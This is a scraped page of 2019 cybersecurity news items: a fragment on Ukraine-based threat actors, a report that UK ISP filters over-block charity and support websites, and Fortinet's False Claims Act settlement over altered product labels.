"It is not uncommon for nascent, geographically limited operations to mature over time and step outside of their region. This has been the case with several actors we regularly track in the Ukraine, where threats to elections and industry developed into the operations we saw during the 2016 elections and the NotPetya event."

Example of Spear-Phishing Email. Source: FireEye
Categories: Cyber Risk News

Support Services Websites Cut Off from UK Public by Gov-Backed ISPs

Info Security - Tue, 04/16/2019 - 13:10
Support Services Websites Cut Off from UK Public by Gov-Backed ISPs

Charity, school and social support websites are being blocked by "overzealous" web filters, which have been designed to protect children from harmful online content. 

According to a study from VPN comparison service and Open Rights Group, "In the last two years around 700,000 websites have been blocked by UK ISPs in a Government-backed attempt to protect vulnerable users online."

The report analysed the results of tests on 35 million unique domains across 15 ISPs and mobile providers. The content filters are active in 3.7 million British households, plus mobile phone users who haven't opted out.

The study says that "due to a combination of keyword-based, crude and highly opaque filtering systems," over 400 UK charities, social support and school websites have been hit the hardest. These systems have been found to prevent adults from accessing vital information about drug and alcohol addiction, mental health support and sexual and domestic abuse.

The indiscriminate nature of these filters is underlined by the fact that fewer than 5% of cases of previously blocked sites have failed to be overturned since 2017, while 1,300 blocks were reversed, suggesting that many more have been, and remain, incorrectly censored. The issue is compounded by the fact that many businesses and charities are rarely aware that ISPs are blocking their websites unless their own providers are also filtering them.

Jim Killock, executive director at Open Rights Group, said: “Filters are fundamentally bad products that block too much and too little. Our report shows that website publishers are suffering the consequences. The only decent solution is to be very cautious about using filters. People should only use them if they are clear that they are necessary. Unfortunately, many filters are opt-out, so too many people and homes are using them needlessly.

“ISPs are using out-of-the-box solutions from third parties and so tend to pass the buck on queries about filtering. What we need is greater transparency into how ISPs are blocking sites. It should not be down to the volunteer efforts of donation-driven services such as to deal with the problems that this government policy has created.”

The study also found that small businesses had fallen foul of the "aggressive" filters. Drainage companies, for example, had been caught up in ISP filters for using terms like "unblock" under the assumption they are censoring web anonymizers and proxies.

Simon Migliano, head of research at, explained: “A well-intentioned scheme by the government to protect children from harmful content online has become a textbook example of ill-thought-out and ham-fisted censorship. The irony is that the original intent was to protect the vulnerable online whereas now in-need adults are struggling to find vital information, and charities and support centers are being stifled by indiscriminate filters.

“This is a prime example of what happens when you use a blunt instrument for a delicate task. These crude and decidedly intransparent filters are hurting more than they are helping, and the responsibility to improve this dire situation should now sit with the ISPs and the government.” 

This issue is compounded by the complexity of getting innocent sites unblocked and the response rate in rectifying these issues. Almost three in 10 (27.6%) unblock requests to ISPs from 2018 are still unresolved, with TalkTalk and Virgin Media as the worst offenders.

Categories: Cyber Risk News

Fortinet to Pay $545,000 for Violating False Claims Act

Info Security - Tue, 04/16/2019 - 12:56
Fortinet to Pay $545,000 for Violating False Claims Act

Network security company Fortinet has agreed to pay $545,000 to resolve allegations that it violated the US's False Claims Act.

According to the settlement agreement made public on April 12, 2019, "Fortinet acknowledged that during the more than seven years between January of 2009 and the fall of 2016, a Fortinet employee responsible for supply chain management arranged to have labels on certain products altered to make the products appear to be compliant with the Trade Agreement Act (TAA). A portion of the products was resold through distributors and subsequent resellers to U.S. government end users." 

“Today’s announcement illustrates the continuing commitment of the US Attorney’s Office and our law enforcement partners to identify and prosecute fraudulent schemes relating to the sale of goods to the United States,” said US Attorney David L. Anderson.  

“Contractors that supply the US government with Chinese-made technology will be pursued and held accountable when violating the Trade Agreement Act,” said Defense Criminal Investigative Service (DCIS) Special Agent in Charge Bryan D. Denny. “The DCIS and its law enforcement partners are committed to combating procurement fraud and cyber-risk within US Department of Defense programs.”

The TAA prohibits certain government contractors from purchasing products that are not entirely from, or “substantially transformed” in, the United States or certain designated countries. According to the public announcement, in this case Fortinet acknowledged that the "Responsible Employee" directed certain employees and contractors to change product labels so that no country of origin was listed or to include the phrases “Designed in the United States and Canada,” or “Assembled in the United States.”  

According to Fortinet's website, the company serves government organization customers. Some of these include Alamance County in North Carolina and Salt Lake County in Utah. 

The company has agreed to pay $400,000 and to provide the United States Marine Corps with additional equipment valued at $145,000.  

The lawsuit was filed by former Fortinet employee Yuxin “Jay” Fang under the qui tam provisions of the False Claims Act. It was then investigated by the U.S. Attorney’s Office of the Northern District of California, along with other government organizations.

“This settlement displays the steadfast commitment of our agents and our federal law enforcement partners,” said the U.S. Army Criminal Investigation Command’s (USACIDC's) director of major procurement fraud unit, Marion "Frank" Robey. “This settlement is a clear signal to the supply community doing business with the Department of the Army; fraud will not be tolerated in any way, shape or form.” 

Commenting on the isuue, Fortinet said: “We hold ourselves to the highest ethical standards of trust and integrity. This was an isolated incident that involved events from more than two years ago in which a rogue former employee acted against our policies. When we were made aware of the incident, we took immediate action, including thoroughly investigating the matter, terminating the employee and implementing additional safeguards to prevent an issue like this from happening again. The nominal settlement amount of $545,000 reflects in part our cooperation to promptly and thoroughly address this matter.”

Categories: Cyber Risk News